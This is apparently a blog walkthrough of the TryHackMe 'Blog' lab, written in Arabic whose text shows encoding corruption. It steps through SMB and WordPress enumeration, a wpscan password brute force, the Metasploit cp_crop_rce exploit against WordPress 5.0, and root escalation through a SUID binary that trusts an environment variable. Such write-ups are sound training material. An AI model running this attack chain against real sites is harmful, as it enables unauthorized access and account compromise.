Search ๐Ÿ”Ž๐Ÿ–ฅ️

TryHackMe|Blog WriteUp\Walkthrough (Arabic)

ุจุณู… ุงู„ู„ู‡

ุงู„ู„ูŠ ูŠุจุบู‰ ูŠุดูˆู ุงู„ุญู„ ู…ุดุฑูˆุญ ููŠุฏูŠูˆ ูŠุฑุฌุน ู„ู„ููŠุฏูŠูˆ ุนู„ู‰ ู‚ู†ุงุชูŠ ุจุงู„ูŠูˆุชูŠูˆุจ ุนู„ู‰ ู‡ุฐุง ุงู„ุฑุงุจุท:



ุฑุงุจุท ุงู„ุชุญุฏูŠ: https://tryhackme.com/r/room/blog

====================================================

ูƒู„ู…ุฉ IP ููŠ ูƒู„ ุงู„ูƒูˆู…ุงู†ุฏุฒ ุงู„ู„ูŠ ุฃูƒุชุจู‡ุง ุชُุณุชุจุฏู„ ุจุงู„ู€IP ู„ู„ู…ุดูŠู† ุญู‚ุชูƒู… ุนู„ู‰ TryHackMe

ุฃูˆู„ ุญุงุฌุฉ ู†ุดุบู„ ุงู„ู€machine ูˆู†ุชุฃูƒุฏ ุฅู†ู†ุง ุงุชุตู„ู†ุง ุจุดุจูƒุฉ TryHackMe ูˆุงู„ุงุชุตุงู„ ู…ุถุจูˆุท، ุจุนุฏูŠู† ู†ุจุฏุฃ ุจุฃูˆู„ ุฎุทูˆุฉ ู„ู„ุญู„ ูˆู‡ูŠ ุฅู†ู†ุง ู†ุณูˆูŠ scan ู„ู„ุดุจูƒุฉ ุจุงุณุชุฎุฏุงู… nmap

sudo nmap IP -vv

ุทู„ุน ู…ุนุงู†ุง 4 ุจูˆุฑุชุงุช، ู†ุฑุฌุน ู†ุณูˆูŠ Aggressive ุณูƒุงู† ุนู„ูŠู‡ุง

sudo nmap IP -vv -A -p 22,80,139,445

ุนู„ู‰ ุจูˆุฑุช 22 ุนู†ุฏู†ุง SSH ูˆู†ุธุงู… ุงู„ุชุดุบูŠู„ ู„ุฌู‡ุงุฒ ุงู„ุถุญูŠุฉ ู‡ูˆ Ubuntu، ูˆุนู„ู‰ ุจูˆุฑุช 80 ุนู†ุฏู†ุง Apache server، ุฃู…ุง ุจูˆุฑุช 139 ูˆ 445 ู…ุชุนู„ู‚ุฉ ุจุงู„ู€smb. ุจุฑุถูˆ ุฃุนุทุงู†ุง ููŠ ุงู„ู†ุชุงุฆุฌ ุฅู† ุงู„ู€http generator ู‡ูˆ WordPress ูˆุจุฑุถูˆ ุฃุนุทุงู†ุง ุฑู‚ู… ุงู„ู†ุณุฎุฉ ูˆู‡ูˆ 5.0، ูˆู‡ุฐู‡ ู…ุนู„ูˆู…ุฉ ู…ููŠุฏุฉ ูˆู…ู‡ู…ุฉ. 

ุฅุฐุง ุฒุฑู†ุง ุงู„ุตูุญุฉ ุนู„ู‰ ุจูˆุฑุช 80 ููŠ ุงู„ู…ุชุตูุญ، ุจู†ู„ุงู‚ูŠ ุจู„ูˆู‚ ู„ู„ู…ุณุชุฎุฏู… Billy ูˆููŠู‡ุง ุจูˆุณุชุงุช، ูˆู„ูƒู† ู…ุง ุจุฏุงุฎู„ ู‡ุฐู‡ ุงู„ุจูˆุณุชุงุช ุดูŠุก ู…ู‡ู…. 

ูˆ ุฒูŠ ู…ุง ู‚ุงู„ ู„ู†ุง ููŠ ุงู„ุชุญุฏูŠ، ุจู†ุถูŠู ุงู„ู…ูˆู‚ุน ุฅู„ู‰ ู…ู„ู etc/hosts/ ุนู„ู‰ ุงู„ุฌู‡ุงุฒ

ุงู„ุญูŠู† ุจู†ุณุชููŠุฏ ู…ู† ุงู„ู€smb ุนู„ู‰ ุฌู‡ุงุฒ ุงู„ุถุญูŠุฉ ูˆู†ุญุงูˆู„ ู†ุฌู…ุน ู…ุนู„ูˆู…ุงุช ุจุงุณุชุฎุฏุงู…

enum4linux -a IP

ุฃุนุทุงู†ูŠ ุฅู† ุงู„ู€null sessions ู…ุณู…ูˆุญุฉ

ูˆุฃูŠุถุง ุนู†ุฏูŠ ู…ุณุชุฎุฏู…ูŠู† ุนู„ู‰ ุงู„ู†ุธุงู… ุงุณู…ู‡ู… bjoel ูˆุงู„ุซุงู†ูŠ smb

ูˆุจุฑุถูˆ ุนู†ุฏูŠ ุซู„ุงุซุฉ shares

print ูˆ IPC ู‡ูŠ ุงูุชุฑุงุถูŠุฉ ูˆุฏุงุฆู…ุง ู…ูˆุฌูˆุฏุฉ، ูู…ุง ุจู†ุดูŠูƒ ุนู„ูŠู‡ุง، ุจู†ุดูŠูƒ ูู‚ุท ุนู„ู‰ BillySMB. ูˆุจู…ุง ุฅู† ุงู„ู€null sessions ู…ุณู…ูˆุญุฉ ูู†ู‚ุฏุฑ ู†ุฏุฎู„ ุนู„ูŠู‡ ุจุงุณุชุฎุฏุงู… smbclient

smbclient //IP/billySMB

ูˆุฅุฐุง ุนุฑุถู†ุง ุงู„ู…ูˆุฌูˆุฏ ุจู†ู„ู‚ู‰ 3 ู…ู„ูุงุช، ู†ุญู…ู„ู‡ุง ูƒู„ู‡ุง ุนู„ู‰ ุฌู‡ุงุฒู†ุง

get Alice-While-Rabbit.jpg

get tswift.mp4

get check-this.png

ุจุนุฏูŠู† ู†ุดูŠูƒ ุนู„ู‰ ู‡ุฐู‡ ุงู„ู…ู„ูุงุช، ุงู„ู…ู„ู ุงู„ูˆุญูŠุฏ ุงู„ู„ูŠ ุจู†ู„ู‚ู‰ ููŠู‡ ู…ุนู„ูˆู…ุฉ ู‡ูˆ  Alice-While-Rabbit.jpg ูˆุนุดุงู† ู†ุณุชุฎุฑุฌ ุงู„ู…ู„ู ู†ุณุชุฎุฏู…

steghide extract -sf Alice-White-Rabbit.jpg

ุฅุฐุง ุทู„ุจ ูƒู„ู…ุฉ ุงู„ุณุฑ ู†ุถุบุท enter، ุซู… ุจูŠุชุญู…ู„ ู…ุนุงู†ุง ู…ู„ู ุงุณู…ู‡ rabbit_hole ูˆุจุฏุงุฎู„ู‡ ู‡ุฐู‡ ุงู„ุฑุณุงู„ุฉ

:) ู„ุฐู„ูƒ ุจู†ุชูˆู‚ู ู‡ู†ุง، ูˆู†ู†ุชู‚ู„ ู„ู„ู€web

ู†ุณูˆูŠ directory enumeration  ุจุงุณุชุฎุฏุงู… gobuster

gobuster dir -w /usr/share/dirb/wordlists/common.txt -u htttp://IP/ -t 64

ุทู„ุน ู…ุนุงู†ุง ู…ุฌู…ูˆุนุฉ ูƒุจูŠุฑุฉ ู…ู† ุตูุญุงุช wordpress، ูˆู…ุง ููŠ ุตูุญุฉ ู…ُู„ูุชุฉ، ูุจู†ุชุฌุงูˆุฒ ู‡ุฐู‡ ุงู„ุฎุทูˆุฉ. 

ุจู…ุง ุฅู†ู†ุง ุนุฑูู†ุง ุฅู† ุฌู‡ุงุฒ ุงู„ุถุญูŠุฉ ูŠุดุชุบู„ ุนู„ูŠู‡ wordpress، ูุจู†ุณุชุฎุฏู… ุงู„ุฃุฏุงุฉ wpscan ู„ุฌู…ุน ุงู„ู…ุนู„ูˆู…ุงุช

wpscan --url http://blog.thm/ -e u,vp,vt

ู…ุง ุจูŠุทู„ุน ู…ุนุงู†ุง ุดูŠุก ุจุงู„ู†ุณุจุฉ ู„ู„ู€ vulnerable plugins and themes ู„ูƒู† ุจูŠุนุทูŠู†ูŠ ุงู„ุณูƒุงู† ุงุณู…ูŠู† ู„ู…ุณุชุฎุฏู…ูŠู† ุนู„ู‰ ุงู„ู…ูˆู‚ุน ูˆู‡ู… bjoel ูˆ kwheel. 


ู†ุฑุฌุน ู†ุณุชุฎุฏู… wpscan ุนุดุงู† ู†ุจุญุซ ุนู† ูƒู„ู…ุฉ ุงู„ุณุฑ. ุฃูˆู„ ุดูŠุก ุจู†ุญูุธ ุฃุณู…ุงุก ุงู„ู…ุณุชุฎุฏู…ูŠู† ููŠ ู…ู„ู، ูƒู„ ูˆุงุญุฏ ููŠ ุณุทุฑ ู„ูˆุญุฏู‡، ูˆุจุณู…ูŠู‡ users. ุซู… ู†ุดุบู„ ู‡ุฐู‡ ุงู„ูƒูˆู…ุงู†ุฏ:

wpscan --url http://blog.thm/ -U users -P /usr/share/wordlists/rockyou.txt -t64

ูˆุจูŠุทู„ุน ู…ุนุงู†ุง ูƒู„ู…ุฉ ุงู„ุณุฑ ู„ู€kwheel، ุงู„ุญูŠู† ู†ุจุญุซ ุฅุฐุง ูƒุงู† ููŠู‡ ุฃูŠ exploit ู„ู‡ุฐู‡ ุงู„ู†ุณุฎุฉ ู…ู† WordPress

searchsploit wordpress 5.0


ุจู†ุจุญุซ ุนู† ุงู„ู€metasploit exploit ููŠ ู‚ูˆู‚ู„ ูˆุจุชุทู„ุน ู…ุนุงู†ุง ู‡ุฐู‡ ุงู„ุตูุญุฉ، ุงู„ู„ูŠ ุชุญุชูˆูŠ ุนู„ู‰ ุงุณู… ุงู„ู€module ูˆู…ุนู„ูˆู…ุงุช ุนู†ู‡ุง، ูˆุงูŠุด ู†ุญุชุงุฌ ู†ุญุท options

ู†ุฑุฌุน ู„ุฌู‡ุงุฒู†ุง ูˆู†ุดุบู„ metasploit ุซู… ู†ุจุญุซ ุนู† ุงู„ู€module ูˆู†ุดุบู„ู‡ุง

msfconsole -q

use cp_crop_rce

set rhosts IP

set lhost tun0

tun0 ู‡ูˆ ุนู†ูˆุงู† ุงู„ู€openVPN 

set username kwheel

set password ******

run

ุจู†ุญุตู„ ุนู„ู‰ meterpreter 

shell

ุนู„ุดุงู† ู†ุญุตู„ ุนู„ู‰ shell ููŠ ุงู„ู†ุธุงู…

/bin/bash -i

python3 -c 'import pty; pty.spawn("/bin/bash")'

ุจุนุฏูŠู† ู†ุฑูˆุญ ู„ู„ู€home ูˆู†ุดูˆู ูˆุด ุฏุงุฎู„ู‡ ู…ู„ูุงุช، ุจู†ู„ู‚ู‰ user.txt، ูˆู„ูƒู† ู…ุง ู‡ูˆ ุงู„ูู„ุงู‚ ุงู„ู„ูŠ ู†ุจุบุงู‡، ูู…ุง ุนู†ุฏู†ุง ุญู„ ุซุงู†ูŠ ุบูŠุฑ ุฅู†ู†ุง ู†ุฑูุน ุตู„ุงุญูŠุงุชู†ุง ู„ู€root. 


ูˆู…ู…ูƒู† ู†ุจุญุซ ุจู†ูุณู†ุง ุนู† ุทُุฑู‚ ู†ุณุชุบู„ู‡ุง ู„ุฑูุน ุงู„ุตู„ุงุญูŠุงุช، ุฃูˆ ู…ู…ูƒู† ู†ุณุชุฎุฏู… ุณูƒุฑูŠุจุช ูŠุณู‡ู„ ุนู„ูŠู†ุง ุงู„ู…ูˆุถูˆุน، ู…ุซู„ linpeas.sh، ูˆุนุดุงู† ู†ู†ู‚ู„ู‡ ู„ู„ุถุญูŠุฉ ุฃูˆู„ ุดูŠุก ุจู†ุฑุฌุน ู„ู„ู€meterpreter ู†ุถุบุท ุนู„ู‰ ctrl + z ุซู… ู†ุฑูˆุญ ู„ู„ู€tmp ูˆู†ุญู…ู„ ุงู„ู…ู„ู ู‡ู†ุงูƒ

ุทูŠุจ ู„ูŠู‡ ุงุฎุชุฑุช ุงู„ู€tmp ؟؟

ุฃูˆู„ ุญุงุฌุฉ tmp ู‡ูˆ ู…ู„ู ูƒู„ ุงู„ู…ู„ูุงุช ุงู„ู„ูŠ ููŠู‡ ุชُู…ุณุญ ุชู„ู‚ุงุฆูŠุง ุนู†ุฏ ุฅุบู„ุงู‚ ุงู„ุฌู‡ุงุฒ، ูู…ุซู„ุง ู„ูˆ ูƒู†ุช ุชุดุชุบู„ ููŠ ุฌู‡ุงุฒ ุงู„ุถุญูŠุฉ ูˆูุฌุฃุฉ ุชู‚ูู„، ุนู„ุทูˆู„ ุจูŠู†ู…ุณุญ ุฃูŠ ุดูŠุก ุญู…ู„ุชู‡ ู‡ู†ุงูƒ ุนู„ู‰ tmp ูˆูŠุตูŠุฑ ู…ุง ูŠุจู‚ู‰ ู„ูƒ ุฃุซุฑ. 

ุซุงู†ูŠ ุญุงุฌุฉ، ู„ู…ุง ู†ุดุชุบู„ ุนู„ู‰ ุฌู‡ุงุฒ ุฃูุถู„ ุฅู†ู†ุง ู†ุฌุนู„ ู…ู„ูุงุชู†ุง ู…ุญููˆุธุฉ ููŠ ู…ูƒุงู† ูˆุงุญุฏ، ู„ุณู‡ูˆู„ุฉ ุงู„ูˆุตูˆู„ ู„ู‡ุง ูˆู„ุณู‡ูˆู„ุฉ ู…ุณุญู‡ุง ูˆุงู„ุชุฎู„ุต ู…ู†ู‡ุง، ูˆูŠุง ุณู„ุงู… ู„ูˆ ูƒุงู† ู‡ุฐุง ุงู„ู…ูƒุงู† ู‡ูˆ ู…ู† ู†ูุณู‡ ูŠู…ุณุญ ุงู„ู„ูŠ ููŠู‡ ู„ูˆ ุชู… ุฅุบู„ุงู‚ ุงู„ุฌู‡ุงุฒ ุจุดูƒู„ ู…ูุงุฌุฆ. 

cd /tmp

upload linpea.sh ููŠ ู‡ุฐู‡ ุงู„ูƒูˆู…ุงู†ุฏ ุญุทูˆ ุงู„ู…ุณุงุฑ ูƒุงู…ู„ ู„ู€ linpeas.sh ุฅุฐุง ู…ุง ูƒู†ุชูˆ ู…ุดุบู„ูŠู† metasploit ู…ู† ู†ูุณ ุงู„ู…ุฌู„ุฏ ุงู„ู„ูŠ ููŠู‡ ุงู„ุณูƒุฑูŠุจุช. 

ุงู„ุญูŠู† ุชุญู…ู„ ุงู„ู…ู„ู، ู†ุฑุฌุน ู„ู„ู€shell ูˆู†ุบูŠุฑ ุตู„ุงุญูŠุงุช ุงู„ุณูƒุฑูŠุจุช ุนุดุงู† ู†ุดุบู„ู‡

channel -i 1

cd /tmp

chmod +x linpeas.sh

./linpeas.sh 

ููŠ ุงู„ู†ุชุงุฆุฌ ุทู„ุน ู…ุนุงู†ุง SUID ุงุณู…ู‡ checker، ูˆู‡ุฐุง ุงุณู… ุฌุฏูŠุฏ ูˆุจุงู„ุนุงุฏุฉ ู…ูˆ ู…ูˆุฌูˆุฏ. 


ู„ูˆ ุดุบู„ู†ุงู‡ ุจูŠุทุจุน ู„ู†ุง ุงู„ุฑุณุงู„ุฉ Not an Amin


ูˆู„ูˆ ุฌุฑุจู†ุง ูˆุณูˆูŠู†ุง strings، ู…ุง ุจู†ูู‡ู… ูƒูˆูŠุณ ุงู„ู€binary ู„ุฐู„ูƒ ุจุฃู†ู‚ู„ู‡ ู„ุฌู‡ุงุฒูŠ ูˆุฃุฏุฑุณู‡ ุจุงุณุชุฎุฏุงู… ghidra

ู†ุฎุฑุฌ ู…ู† ุงู„ู€shell ุจุงุณุชุฎุฏุงู… ctrl + z

ุซู… 

download /usr/sbin/checker

ุซู… ู†ุดุบู„ ghidra ุนู„ู‰ ุฌู‡ุงุฒู†ุง، ู…ู† ู‚ุงุฆู…ุฉ file ู†ุฎุชุงุฑ New project ุซู… ู†ุถุบุท Next ุซู… ู†ุฎุชุงุฑ ุงู„ู…ุฌู„ุฏ ุงู„ู„ูŠ ู†ุจูŠ ู†ุญูุธ ููŠู‡، ุงุฎุชุงุฑูˆุง ุฃูŠ ู…ุฌู„ุฏ ุชุจุบูˆู†. ุซู… ู†ุนุทูŠ ุงู„ู€project ุงุณู…، ุจุฑุถูˆ ุญุทูˆ ุฃูŠ ุงุณู… ุชุจุบูˆู†، ุขุฎุฑ ุดูŠุก ู†ุถุบุท finish. 

ุจูŠุฑุฌุนู†ุง ู„ุฃูˆู„ ุตูุญุฉ، ู†ุฑุฌุน ู…ู† ู‚ุงุฆู…ุฉ file ูˆู†ุฎุชุงุฑ import file، ุซู… ู†ุฎุชุงุฑ ุงู„ู…ู„ู ุงู„ู„ูŠ ุชูˆ ุญู…ู„ู†ุงู‡ ูˆุงู„ู„ูŠ ู‡ูˆ checker ุซู… ุจูŠุทู„ุน ู„ู†ุง ู‡ุฐู‡ ุงู„ู†ุงูุฐุฉ


ู†ุฎู„ูŠ ูƒู„ ุดูŠุก ุฒูŠ ู…ุง ู‡ูˆ ูˆู†ุถุบุท ok

ุจุนุฏ ูƒุฐุง ุจู†ุฑุฌุน ุจุฑุถูˆ ุนู„ู‰ ุฃูˆู„ ุตูุญุฉ، ู†ุถุบุท ุนู„ู‰ ุงู„ุชู†ูŠู† ุงู„ุฃุฎุถุฑ ูˆุจูŠูุชุญ ู…ุนุงูŠ ู†ุงูุฐุฉ ูƒุจูŠุฑุฉ، ู…ู† ู‚ุงุฆู…ุฉ file، ู†ุฎุชุงุฑ open، ุซู… ู†ุฑูˆุญ ู„ู„ู…ู„ู checker ูˆู†ูุชุญู‡، ุจูŠุทู„ุน ู„ู†ุง ู†ุงูุฐุฉ ู†ุฎุชุงุฑ yes، ุซู… ุจูŠูุชุญ ู†ุงูุฐุฉ analysis options ู†ุญุท ุตุญ ุนู†ุฏ Decompiler Parameter ID، ุซู… ู†ุถุบุท Analyze. 

ุจูŠุทู„ุน ู„ู†ุง ุจุนุฏ ุชุญู„ูŠู„ ุงู„ุจุงูŠู†ุงุฑูŠ ู‡ุฐุง ุงู„ูƒูˆุฏ ุจู„ุบุฉ c


ุงู„ูƒูˆุฏ ุจุงุฎุชุตุงุฑ ูŠุงุฎุฐ ู‚ูŠู…ุฉ ุงู„ู€environment variable ุงู„ู„ูŠ ุงุณู…ู‡ admin ูˆูŠุดูˆู ู„ูˆ ูƒุงู† ููŠู‡ ู‚ูŠู…ุฉ، ุฃูŠ ู‚ูŠู…ุฉ ุจูŠุฎู„ูŠ ุงู„ู€user id ูŠุณุงูˆูŠ 0 ูˆุงู„ู„ูŠ ู‡ูˆ ูŠุนู†ูŠ root، ุซู… ุจูŠุนุทูŠู†ูŠ shell، ุฃู…ุง ููŠ ุญุงู„ุฉ ูƒุงู† ู…ุง ู„ู„ู€admin ู‚ูŠู…ุฉ ุจูŠุทุจุน ู„ู†ุง ุฑุณุงู„ุฉ Not an admin. ูุงู„ู„ูŠ ู†ุญุชุงุฌ ู†ุณูˆูŠู‡ ุจูƒู„ ุณู‡ูˆู„ุฉ ุงู„ุขู† ุฅู†ู†ุง ู†ุนَุฑِّู ู…ุชุบูŠุฑ ุงุณู…ู‡ admin ูˆู†ุฎุฒู† ููŠู‡ ุฃูŠ ู‚ูŠู…ุฉ، ูˆุจุนุฏูŠู† ู†ุดุบู„ ุงู„ุจุงูŠู†ุงุฑูŠ، ูˆุนู„ุทูˆู„ ุจู†ุญุตู„ ุนู„ู‰ root shell. 

ู†ุฑุฌุน ุงู„ุญูŠู† ุนู„ู‰ ุงู„ุถุญูŠุฉ ูˆู†ุดุบู„ ุงู„ู€shell 

shell

export admin=1 

checker

ูˆุนู„ุทูˆู„ ุจู†ุญุตู„ ุนู„ู‰ root shell

ู†ุณูˆูŠ spawn ู„ู€ bash

/bin/bash -i 

ุซู… ู†ุจุญุซ ุนู† ุงู„ูู„ุงู‚ุงุช

ุงู„ู€ root.txt ู…ูˆุฌูˆุฏ ุนู„ู‰ ุงู„ู€root home directory

cd /root

cat root.txt 

ูˆุจูƒุฐุง ุญุตู„ู†ุง ุนู„ู‰ ุงู„ูู„ุงู‚ ✨، ุจุงู‚ูŠู„ู†ุง ูˆุงุญุฏ ุซุงู†ูŠ، ูู†ุจุญุซ ุนู†ู‡ 

find / -name "user.txt" -type f 

ูˆุจูŠุทู„ุน ูˆูŠู† ู…ุญููˆุธ


cat /media/usb/user.txt

ูˆุจูƒุฐุง ู†ูƒูˆู† ุญุตู„ู†ุง ุนู„ู‰ ุงู„ูู„ุงู‚ ุงู„ุขุฎุฑ ูˆุงู†ุชู‡ูŠู†ุง ู…ู† ุงู„ุญู„ ✨. 

ู‡ู†ุง ุญู„ ุงู„ุฃุณุฆู„ุฉ ุจุงุณุชุซู†ุงุก ุงู„ูู„ุงู‚ุงุช:



Comments

Popular posts from this blog

TryHackMe|GoldenEye WriteUp\Walkthrough (English)

TryHackMe|Gallery WriteUp\Walkthrough (English)